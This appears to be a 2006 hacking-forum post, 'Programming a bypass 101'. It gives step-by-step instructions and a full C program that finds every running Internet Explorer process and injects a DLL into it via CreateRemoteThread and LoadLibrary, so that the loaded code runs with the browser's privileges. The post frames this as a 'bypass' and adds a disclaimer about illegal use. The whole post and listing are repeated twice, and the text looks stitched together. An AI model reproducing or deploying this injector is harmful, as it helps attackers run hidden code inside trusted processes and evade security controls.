synack
10-21-2006, 07:47 AM
================================================== ===============
To Whom it may concern,
back off before I stick a lightsaber up your ass and turn it on.
================================================== ===============
Don't come crying to me if you do anything illegal with
this code.
Thanks to hakin9.labs in Poland for the original concept.
Check issue 4/2005 of hakin9 magazine for the original code.
I have just cleaned up the code some.
To get this to work you need to complete the following
1 - find a target process. Take a snapshot with CreateToolhelp32Snapshot() and walk it with
Process32First() and Process32Next(), much like traversing a linked list, comparing each
entry's szExeFile against the image name you want (iexplore.exe in the listing below).
2 - open the process with OpenProcess() using only the rights the injection needs (create
thread, query information, VM operation/write), allocate a buffer in it with VirtualAllocEx()
and copy the DLL path into that buffer with WriteProcessMemory().
3 - start a thread in the target with CreateRemoteThread() whose start routine is LoadLibrary
and whose argument is that buffer: the target process then loads the DLL itself, and the
thread's exit code is the module handle, which a second remote thread can hand to FreeLibrary.
4 - write the DLL that gets loaded; whatever it does runs inside the target, with the target's
privileges. Issue 4/2005 of hakin9 magazine has a sample function. Note that the listing
below only computes the injector's own path (SetPath) and never swaps in the DLL's file name,
so that step is left to the reader.
Structured Programming tips;
----------------------------
Sequence
Selection
Repetition
Recycle your code. Write a function once and re-use it
on other projects. Start building your own lib
There are a number of Win32 calls in this code; to understand what each one does,
read through the header files and the Windows API documentation for it. Read up
on function prototypes as well. The next post on thebroken.phorum
will be about writing bots and spiders in Java.
synack
Programming a bypass 101 - attaching threads to a host application
=================================================
/* beginning of code segment */
/*
* oilz.c
*
* I have chosen iexplore.exe (Internet Explorer) as the
* default target; FindInternetExplorer() matches on that name.
* Any questions' or constructive criticism, pm me
* on the forum.
*
* One of the first tasks you need to complete
* is to make sure you have these header files
* on the system you compile the code on, or
* you will get all sorts of confusing errors from
* the preprocessor.
*/
/*
* header files that the program requires
* check the following URLs' for more information
* http://www.hakin9.org/es/index.php?page=poleca
* http://www.koders.com/c/fidB7C2788ACDE2858F32DA237A95FD33D5048877DA.aspx
* http://www.winapi.org/
*/
#include <windows.h> /* Header file for windows */
#include <tlhelp32.h> /* tool help32 header file */
#include <stdio.h> /* Standard input/output header */
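/*
 * Function prototypes.  A prototype tells the compiler the return type and
 * the parameter list before the definition is seen, so a mismatched call is
 * a compile-time error instead of undefined behaviour.  In C an empty "()"
 * means "unspecified arguments", not "no arguments" -- "(void)" is the latter.
 */
BOOL AttachThread(HANDLE hTarget);
BOOL FindInternetExplorer(void);
BOOL UnloadThread(void);
BOOL InitiateThread(void);
BOOL SetPath(void);

/*
 * Globals shared by the helpers below.  Kept global for the tutorial's sake;
 * a real tool would pass a context struct.  File-scope objects are
 * zero-initialised, so a handle that was never assigned reads as NULL.
 */
HANDLE hProcessSnap;            /* Toolhelp snapshot of running processes      */
HANDLE hProcess;                /* handle to the current target process         */
PROCESSENTRY32 pe32;            /* current entry while walking the snapshot     */
TCHAR ModuleFileName[MAX_PATH]; /* this executable's full path (set by SetPath) */
LPTSTR FileName;                /* points at the file-name part of it           */
DWORD dwPriorityClass;          /* not used anywhere in this listing            */
LPVOID RemoteFileName;          /* buffer allocated in the target for the path  */
HANDLE hRemoteThread;           /* thread created in the target                 */
HINSTANCE RemoteModule;         /* module handle the remote LoadLibrary returned
                                   (recovered from the thread's exit code)      */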
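/*
 * Entry point.  argc/argv are unused: the target image name is hard-coded in
 * FindInternetExplorer().  The exit status mirrors that function's result
 * (0 on success, 1 on failure) so a batch file can test it.  The original
 * "exit 0;" was not valid C.
 */
int
main(int argc, char *argv[]){
    (void)argc;
    (void)argv;
    return FindInternetExplorer() ? 0 : 1;
}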
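/*
 * Wait for the remote LoadLibrary thread to finish, recover the HMODULE it
 * returned, then run FreeLibrary on that module inside the target so the
 * library is unloaded again.  Finally release the path buffer and every
 * handle this file holds on the target.
 *
 * Reads the globals hProcess, hRemoteThread and RemoteFileName; stores the
 * recovered module handle in RemoteModule and clears hRemoteThread and
 * RemoteFileName once they have been released.
 *
 * Returns FALSE if there was no remote thread, its exit code could not be
 * read, the remote LoadLibrary returned NULL, or the FreeLibrary thread could
 * not be started; TRUE once FreeLibrary has run.  Cleanup happens on every
 * path.  The original overwrote hRemoteThread with the FreeLibrary thread
 * without closing the first handle (leak) and never waited for FreeLibrary.
 *
 * Limitation: a thread exit code is a DWORD, so the full HMODULE is only
 * recovered when the target is a 32-bit process.  Using the local address of
 * FreeLibrary in the target also assumes kernel32.dll is mapped at the same
 * base in both processes, which the listing relies on throughout; injector
 * and target must be of the same bitness.
 */
BOOL
UnloadThread(void){
    BOOL ok = FALSE;
    DWORD exitCode = 0;
    FARPROC pfnFreeLibrary;
    HANDLE hFreeThread = NULL;

    if(hRemoteThread == NULL){
        goto cleanup;
    }
    WaitForSingleObject(hRemoteThread, INFINITE);
    if(!GetExitCodeThread(hRemoteThread, &exitCode) || exitCode == 0){
        goto cleanup;           /* LoadLibrary failed inside the target */
    }
    RemoteModule = (HINSTANCE)(ULONG_PTR)exitCode;

    pfnFreeLibrary = GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")),
                                    "FreeLibrary");
    if(pfnFreeLibrary == NULL){
        goto cleanup;
    }
    hFreeThread = CreateRemoteThread(hProcess, NULL, 0,
                                     (LPTHREAD_START_ROUTINE)pfnFreeLibrary,
                                     (LPVOID)RemoteModule, 0, NULL);
    if(hFreeThread == NULL){
        goto cleanup;
    }
    WaitForSingleObject(hFreeThread, INFINITE);
    ok = TRUE;

cleanup:
    if(hFreeThread != NULL){
        CloseHandle(hFreeThread);
    }
    if(hRemoteThread != NULL){
        CloseHandle(hRemoteThread);
        hRemoteThread = NULL;
    }
    if(RemoteFileName != NULL){
        VirtualFreeEx(hProcess, RemoteFileName, 0, MEM_RELEASE);
        RemoteFileName = NULL;
    }
    return ok;
}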
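/*
 * Create a thread in the target process whose start routine is LoadLibrary
 * and whose single argument is RemoteFileName, the path string AttachThread
 * has already written into the target.  The target thus loads that file as a
 * library itself.
 *
 * LoadLibraryA or LoadLibraryW is chosen to match the TCHAR width this binary
 * was built with, because the string in the target is a TCHAR string.  The
 * local address of the routine is used directly in the target, which only
 * works when kernel32.dll sits at the same base in both, i.e. same bitness.
 *
 * On success hRemoteThread holds the new thread handle and TRUE is returned;
 * on failure hRemoteThread is NULL and FALSE is returned so the caller can
 * skip the wait/unload step.  The original returned TRUE unconditionally and
 * was missing the opening parenthesis of the cast.
 */
BOOL
InitiateThread(void){
    FARPROC pfnLoadLibrary;

    hRemoteThread = NULL;
    if(hProcess == NULL || RemoteFileName == NULL){
        return FALSE;
    }
    pfnLoadLibrary = GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")),
#ifdef UNICODE
                                    "LoadLibraryW");
#else
                                    "LoadLibraryA");
#endif
    if(pfnLoadLibrary == NULL){
        return FALSE;
    }
    hRemoteThread = CreateRemoteThread(hProcess, NULL, 0,
                                       (LPTHREAD_START_ROUTINE)pfnLoadLibrary,
                                       RemoteFileName, 0, NULL);
    return hRemoteThread != NULL;
}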
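/*
 * Fill ModuleFileName with this executable's full path and point FileName at
 * its file-name component: the character after the last '\\' or '/', or the
 * start of the buffer when there is no separator.
 *
 * Returns FALSE if GetModuleFileName fails or the path does not fit in
 * MAX_PATH characters (a truncated result is not guaranteed to be
 * NUL-terminated, so it must not be handed to the target), TRUE otherwise.
 *
 * The original loop decremented the pointer and then incremented it again on
 * every pass, so it never terminated; it also spelled "While" and used an
 * unterminated character literal for the forward slash.
 *
 * NOTE(review): nothing in this listing overwrites the file-name part with a
 * DLL name, so as written the path handed to the remote LoadLibrary is this
 * injector's own executable.  The hakin9 article presumably copies the DLL's
 * name to FileName at this point (step 4 of the write-up); confirm against
 * the original before relying on this code.
 */
BOOL
SetPath(void){
    DWORD len;

    ModuleFileName[0] = TEXT('\0');
    len = GetModuleFileName(NULL, ModuleFileName, MAX_PATH);
    if(len == 0 || len >= MAX_PATH){
        return FALSE;
    }
    ModuleFileName[MAX_PATH - 1] = TEXT('\0');

    /* Walk back from the terminator and stop just after the last separator. */
    FileName = &ModuleFileName[len];
    while(FileName > ModuleFileName
          && FileName[-1] != TEXT('\\')
          && FileName[-1] != TEXT('/')){
        FileName--;
    }
    return TRUE;
}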
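/*
 * Inject into the process identified by hTarget, the classic
 * CreateRemoteThread + LoadLibrary technique:
 *   1. allocate a buffer in the target large enough for a TCHAR path,
 *   2. compute our own path locally (SetPath) and copy it into that buffer,
 *   3. start a remote LoadLibrary thread on it (InitiateThread),
 *   4. wait for it, recover the module handle and unload again (UnloadThread).
 *
 * hTarget must have been opened with at least PROCESS_CREATE_THREAD,
 * PROCESS_QUERY_INFORMATION, PROCESS_VM_OPERATION and PROCESS_VM_WRITE.  The
 * helpers read the global hProcess, so it is set from hTarget here; the
 * original's parameter silently shadowed that global instead.  Opening a
 * process owned by another user generally also needs SeDebugPrivilege, and
 * injector and target must be of the same bitness.
 *
 * Returns TRUE only when every step succeeded.  On failure the remote buffer
 * and any thread handle are released and FALSE is returned; the original
 * carried on into WriteProcessMemory and UnloadThread even after the
 * allocation had failed.
 *
 * The buffer is sized in bytes from sizeof ModuleFileName rather than
 * MAX_PATH: in a UNICODE build MAX_PATH bytes is only half the path, so the
 * original could hand LoadLibraryW an unterminated string.
 */
BOOL
AttachThread( HANDLE hTarget){
    hProcess = hTarget;
    hRemoteThread = NULL;

    /* The path is plain data; it needs to be readable, not executable. */
    RemoteFileName = VirtualAllocEx(hProcess, NULL, sizeof ModuleFileName,
                                    MEM_COMMIT, PAGE_READWRITE);
    if(RemoteFileName == NULL){
        return FALSE;
    }
    if(!SetPath()){
        goto fail;
    }
    if(!WriteProcessMemory(hProcess, RemoteFileName, ModuleFileName,
                           sizeof ModuleFileName, NULL)){
        goto fail;
    }
    if(!InitiateThread()){
        goto fail;
    }
    /* UnloadThread waits, then releases the thread handle and the buffer. */
    return UnloadThread();

fail:
    if(hRemoteThread != NULL){
        CloseHandle(hRemoteThread);
        hRemoteThread = NULL;
    }
    VirtualFreeEx(hProcess, RemoteFileName, 0, MEM_RELEASE);
    RemoteFileName = NULL;
    return FALSE;
}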
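/*
 * Walk a Toolhelp snapshot of all processes and inject into every one whose
 * image name is iexplore.exe.  The comparison is case-insensitive and
 * TCHAR-aware: PROCESSENTRY32::szExeFile is a TCHAR array, so the original's
 * strcmp against a narrow literal was wrong in a UNICODE build.
 *
 * Only the access rights the injection uses are requested -- the set MSDN
 * lists for CreateRemoteThread -- instead of PROCESS_ALL_ACCESS; asking for
 * more than needed is a least-privilege violation and only adds spurious
 * access-denied failures.  Processes that cannot be opened (other user,
 * protected, already exited) are skipped.
 *
 * Returns FALSE if the snapshot could not be taken or walked, otherwise TRUE
 * when at least one process was injected successfully.  The original
 * returned TRUE even when no iexplore.exe existed, used "false" and
 * "sizeof(ProcessEntry32)" (neither is defined), called CloseHandle on a NULL
 * handle, and had a stray space in th32ProcessID.
 */
BOOL
FindInternetExplorer(void){
    const DWORD rights = PROCESS_CREATE_THREAD
                       | PROCESS_QUERY_INFORMATION
                       | PROCESS_VM_OPERATION
                       | PROCESS_VM_READ
                       | PROCESS_VM_WRITE;
    BOOL injected = FALSE;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if(hProcessSnap == INVALID_HANDLE_VALUE){
        return FALSE;
    }

    /* dwSize must be set before Process32First or the call fails. */
    pe32.dwSize = sizeof pe32;
    if(!Process32First(hProcessSnap, &pe32)){
        CloseHandle(hProcessSnap);
        return FALSE;
    }

    do{
        if(lstrcmpi(pe32.szExeFile, TEXT("iexplore.exe")) != 0){
            continue;
        }
        hProcess = OpenProcess(rights, FALSE, pe32.th32ProcessID);
        if(hProcess == NULL){
            continue;           /* access denied or process already gone */
        }
        if(AttachThread(hProcess)){
            injected = TRUE;
        }
        CloseHandle(hProcess);
        hProcess = NULL;
    }while(Process32Next(hProcessSnap, &pe32));

    CloseHandle(hProcessSnap);
    return injected;
}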
/* end of code segment */
To Whom it may concern,
back off before I stick a lightsaber up your ass and turn it on.
================================================== ===============
Don't come crying to me if you do anything illegal with
this code.
Thanks to hakin9.labs in Poland for the original concept.
Check issue 4/2005 of hakin9 magazine for the original code.
I have just cleaned up the code some.
To get this to work you need to complete the following
1 - find a target process. Take a snapshot with CreateToolhelp32Snapshot() and walk it with
Process32First() and Process32Next(), much like traversing a linked list, comparing each
entry's szExeFile against the image name you want (iexplore.exe in the listing below).
2 - open the process with OpenProcess() using only the rights the injection needs (create
thread, query information, VM operation/write), allocate a buffer in it with VirtualAllocEx()
and copy the DLL path into that buffer with WriteProcessMemory().
3 - start a thread in the target with CreateRemoteThread() whose start routine is LoadLibrary
and whose argument is that buffer: the target process then loads the DLL itself, and the
thread's exit code is the module handle, which a second remote thread can hand to FreeLibrary.
4 - write the DLL that gets loaded; whatever it does runs inside the target, with the target's
privileges. Issue 4/2005 of hakin9 magazine has a sample function. Note that the listing
below only computes the injector's own path (SetPath) and never swaps in the DLL's file name,
so that step is left to the reader.
Structured Programming tips;
----------------------------
Sequence
Selection
Repetition
Recycle your code. Write a function once and re-use it
on other projects. Start building your own lib
There are a number of Win32 calls in this code; to understand what each one does,
read through the header files and the Windows API documentation for it. Read up
on function prototypes as well. The next post on thebroken.phorum
will be about writing bots and spiders in Java.
synack
Programming a bypass 101 - attaching threads to a host application
=================================================
/* beginning of code segment */
/*
* oilz.c
*
* I have chosen iexplore.exe (Internet Explorer) as the
* default target; FindInternetExplorer() matches on that name.
* Any questions' or constructive criticism, pm me
* on the forum.
*
* One of the first tasks you need to complete
* is to make sure you have these header files
* on the system you compile the code on, or
* you will get all sorts of confusing errors from
* the preprocessor.
*/
/*
* header files that the program requires
* check the following URLs' for more information
* http://www.hakin9.org/es/index.php?page=poleca
* http://www.koders.com/c/fidB7C2788ACDE2858F32DA237A95FD33D5048877DA.aspx
* http://www.winapi.org/
*/
#include <windows.h> /* Header file for windows */
#include <tlhelp32.h> /* tool help32 header file */
#include <stdio.h> /* Standard input/output header */
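/*
 * Function prototypes.  A prototype tells the compiler the return type and
 * the parameter list before the definition is seen, so a mismatched call is
 * a compile-time error instead of undefined behaviour.  In C an empty "()"
 * means "unspecified arguments", not "no arguments" -- "(void)" is the latter.
 */
BOOL AttachThread(HANDLE hTarget);
BOOL FindInternetExplorer(void);
BOOL UnloadThread(void);
BOOL InitiateThread(void);
BOOL SetPath(void);

/*
 * Globals shared by the helpers below.  Kept global for the tutorial's sake;
 * a real tool would pass a context struct.  File-scope objects are
 * zero-initialised, so a handle that was never assigned reads as NULL.
 */
HANDLE hProcessSnap;            /* Toolhelp snapshot of running processes      */
HANDLE hProcess;                /* handle to the current target process         */
PROCESSENTRY32 pe32;            /* current entry while walking the snapshot     */
TCHAR ModuleFileName[MAX_PATH]; /* this executable's full path (set by SetPath) */
LPTSTR FileName;                /* points at the file-name part of it           */
DWORD dwPriorityClass;          /* not used anywhere in this listing            */
LPVOID RemoteFileName;          /* buffer allocated in the target for the path  */
HANDLE hRemoteThread;           /* thread created in the target                 */
HINSTANCE RemoteModule;         /* module handle the remote LoadLibrary returned
                                   (recovered from the thread's exit code)      */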
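/*
 * Entry point.  argc/argv are unused: the target image name is hard-coded in
 * FindInternetExplorer().  The exit status mirrors that function's result
 * (0 on success, 1 on failure) so a batch file can test it.  The original
 * "exit 0;" was not valid C.
 */
int
main(int argc, char *argv[]){
    (void)argc;
    (void)argv;
    return FindInternetExplorer() ? 0 : 1;
}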
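/*
 * Wait for the remote LoadLibrary thread to finish, recover the HMODULE it
 * returned, then run FreeLibrary on that module inside the target so the
 * library is unloaded again.  Finally release the path buffer and every
 * handle this file holds on the target.
 *
 * Reads the globals hProcess, hRemoteThread and RemoteFileName; stores the
 * recovered module handle in RemoteModule and clears hRemoteThread and
 * RemoteFileName once they have been released.
 *
 * Returns FALSE if there was no remote thread, its exit code could not be
 * read, the remote LoadLibrary returned NULL, or the FreeLibrary thread could
 * not be started; TRUE once FreeLibrary has run.  Cleanup happens on every
 * path.  The original overwrote hRemoteThread with the FreeLibrary thread
 * without closing the first handle (leak) and never waited for FreeLibrary.
 *
 * Limitation: a thread exit code is a DWORD, so the full HMODULE is only
 * recovered when the target is a 32-bit process.  Using the local address of
 * FreeLibrary in the target also assumes kernel32.dll is mapped at the same
 * base in both processes, which the listing relies on throughout; injector
 * and target must be of the same bitness.
 */
BOOL
UnloadThread(void){
    BOOL ok = FALSE;
    DWORD exitCode = 0;
    FARPROC pfnFreeLibrary;
    HANDLE hFreeThread = NULL;

    if(hRemoteThread == NULL){
        goto cleanup;
    }
    WaitForSingleObject(hRemoteThread, INFINITE);
    if(!GetExitCodeThread(hRemoteThread, &exitCode) || exitCode == 0){
        goto cleanup;           /* LoadLibrary failed inside the target */
    }
    RemoteModule = (HINSTANCE)(ULONG_PTR)exitCode;

    pfnFreeLibrary = GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")),
                                    "FreeLibrary");
    if(pfnFreeLibrary == NULL){
        goto cleanup;
    }
    hFreeThread = CreateRemoteThread(hProcess, NULL, 0,
                                     (LPTHREAD_START_ROUTINE)pfnFreeLibrary,
                                     (LPVOID)RemoteModule, 0, NULL);
    if(hFreeThread == NULL){
        goto cleanup;
    }
    WaitForSingleObject(hFreeThread, INFINITE);
    ok = TRUE;

cleanup:
    if(hFreeThread != NULL){
        CloseHandle(hFreeThread);
    }
    if(hRemoteThread != NULL){
        CloseHandle(hRemoteThread);
        hRemoteThread = NULL;
    }
    if(RemoteFileName != NULL){
        VirtualFreeEx(hProcess, RemoteFileName, 0, MEM_RELEASE);
        RemoteFileName = NULL;
    }
    return ok;
}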
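/*
 * Create a thread in the target process whose start routine is LoadLibrary
 * and whose single argument is RemoteFileName, the path string AttachThread
 * has already written into the target.  The target thus loads that file as a
 * library itself.
 *
 * LoadLibraryA or LoadLibraryW is chosen to match the TCHAR width this binary
 * was built with, because the string in the target is a TCHAR string.  The
 * local address of the routine is used directly in the target, which only
 * works when kernel32.dll sits at the same base in both, i.e. same bitness.
 *
 * On success hRemoteThread holds the new thread handle and TRUE is returned;
 * on failure hRemoteThread is NULL and FALSE is returned so the caller can
 * skip the wait/unload step.  The original returned TRUE unconditionally and
 * was missing the opening parenthesis of the cast.
 */
BOOL
InitiateThread(void){
    FARPROC pfnLoadLibrary;

    hRemoteThread = NULL;
    if(hProcess == NULL || RemoteFileName == NULL){
        return FALSE;
    }
    pfnLoadLibrary = GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")),
#ifdef UNICODE
                                    "LoadLibraryW");
#else
                                    "LoadLibraryA");
#endif
    if(pfnLoadLibrary == NULL){
        return FALSE;
    }
    hRemoteThread = CreateRemoteThread(hProcess, NULL, 0,
                                       (LPTHREAD_START_ROUTINE)pfnLoadLibrary,
                                       RemoteFileName, 0, NULL);
    return hRemoteThread != NULL;
}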
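/*
 * Fill ModuleFileName with this executable's full path and point FileName at
 * its file-name component: the character after the last '\\' or '/', or the
 * start of the buffer when there is no separator.
 *
 * Returns FALSE if GetModuleFileName fails or the path does not fit in
 * MAX_PATH characters (a truncated result is not guaranteed to be
 * NUL-terminated, so it must not be handed to the target), TRUE otherwise.
 *
 * The original loop decremented the pointer and then incremented it again on
 * every pass, so it never terminated; it also spelled "While" and used an
 * unterminated character literal for the forward slash.
 *
 * NOTE(review): nothing in this listing overwrites the file-name part with a
 * DLL name, so as written the path handed to the remote LoadLibrary is this
 * injector's own executable.  The hakin9 article presumably copies the DLL's
 * name to FileName at this point (step 4 of the write-up); confirm against
 * the original before relying on this code.
 */
BOOL
SetPath(void){
    DWORD len;

    ModuleFileName[0] = TEXT('\0');
    len = GetModuleFileName(NULL, ModuleFileName, MAX_PATH);
    if(len == 0 || len >= MAX_PATH){
        return FALSE;
    }
    ModuleFileName[MAX_PATH - 1] = TEXT('\0');

    /* Walk back from the terminator and stop just after the last separator. */
    FileName = &ModuleFileName[len];
    while(FileName > ModuleFileName
          && FileName[-1] != TEXT('\\')
          && FileName[-1] != TEXT('/')){
        FileName--;
    }
    return TRUE;
}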
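/*
 * Inject into the process identified by hTarget, the classic
 * CreateRemoteThread + LoadLibrary technique:
 *   1. allocate a buffer in the target large enough for a TCHAR path,
 *   2. compute our own path locally (SetPath) and copy it into that buffer,
 *   3. start a remote LoadLibrary thread on it (InitiateThread),
 *   4. wait for it, recover the module handle and unload again (UnloadThread).
 *
 * hTarget must have been opened with at least PROCESS_CREATE_THREAD,
 * PROCESS_QUERY_INFORMATION, PROCESS_VM_OPERATION and PROCESS_VM_WRITE.  The
 * helpers read the global hProcess, so it is set from hTarget here; the
 * original's parameter silently shadowed that global instead.  Opening a
 * process owned by another user generally also needs SeDebugPrivilege, and
 * injector and target must be of the same bitness.
 *
 * Returns TRUE only when every step succeeded.  On failure the remote buffer
 * and any thread handle are released and FALSE is returned; the original
 * carried on into WriteProcessMemory and UnloadThread even after the
 * allocation had failed.
 *
 * The buffer is sized in bytes from sizeof ModuleFileName rather than
 * MAX_PATH: in a UNICODE build MAX_PATH bytes is only half the path, so the
 * original could hand LoadLibraryW an unterminated string.
 */
BOOL
AttachThread( HANDLE hTarget){
    hProcess = hTarget;
    hRemoteThread = NULL;

    /* The path is plain data; it needs to be readable, not executable. */
    RemoteFileName = VirtualAllocEx(hProcess, NULL, sizeof ModuleFileName,
                                    MEM_COMMIT, PAGE_READWRITE);
    if(RemoteFileName == NULL){
        return FALSE;
    }
    if(!SetPath()){
        goto fail;
    }
    if(!WriteProcessMemory(hProcess, RemoteFileName, ModuleFileName,
                           sizeof ModuleFileName, NULL)){
        goto fail;
    }
    if(!InitiateThread()){
        goto fail;
    }
    /* UnloadThread waits, then releases the thread handle and the buffer. */
    return UnloadThread();

fail:
    if(hRemoteThread != NULL){
        CloseHandle(hRemoteThread);
        hRemoteThread = NULL;
    }
    VirtualFreeEx(hProcess, RemoteFileName, 0, MEM_RELEASE);
    RemoteFileName = NULL;
    return FALSE;
}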
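/*
 * Walk a Toolhelp snapshot of all processes and inject into every one whose
 * image name is iexplore.exe.  The comparison is case-insensitive and
 * TCHAR-aware: PROCESSENTRY32::szExeFile is a TCHAR array, so the original's
 * strcmp against a narrow literal was wrong in a UNICODE build.
 *
 * Only the access rights the injection uses are requested -- the set MSDN
 * lists for CreateRemoteThread -- instead of PROCESS_ALL_ACCESS; asking for
 * more than needed is a least-privilege violation and only adds spurious
 * access-denied failures.  Processes that cannot be opened (other user,
 * protected, already exited) are skipped.
 *
 * Returns FALSE if the snapshot could not be taken or walked, otherwise TRUE
 * when at least one process was injected successfully.  The original
 * returned TRUE even when no iexplore.exe existed, used "false" and
 * "sizeof(ProcessEntry32)" (neither is defined), called CloseHandle on a NULL
 * handle, and had a stray space in th32ProcessID.
 */
BOOL
FindInternetExplorer(void){
    const DWORD rights = PROCESS_CREATE_THREAD
                       | PROCESS_QUERY_INFORMATION
                       | PROCESS_VM_OPERATION
                       | PROCESS_VM_READ
                       | PROCESS_VM_WRITE;
    BOOL injected = FALSE;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if(hProcessSnap == INVALID_HANDLE_VALUE){
        return FALSE;
    }

    /* dwSize must be set before Process32First or the call fails. */
    pe32.dwSize = sizeof pe32;
    if(!Process32First(hProcessSnap, &pe32)){
        CloseHandle(hProcessSnap);
        return FALSE;
    }

    do{
        if(lstrcmpi(pe32.szExeFile, TEXT("iexplore.exe")) != 0){
            continue;
        }
        hProcess = OpenProcess(rights, FALSE, pe32.th32ProcessID);
        if(hProcess == NULL){
            continue;           /* access denied or process already gone */
        }
        if(AttachThread(hProcess)){
            injected = TRUE;
        }
        CloseHandle(hProcess);
        hProcess = NULL;
    }while(Process32Next(hProcessSnap, &pe32));

    CloseHandle(hProcessSnap);
    return injected;
}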
/* end of code segment */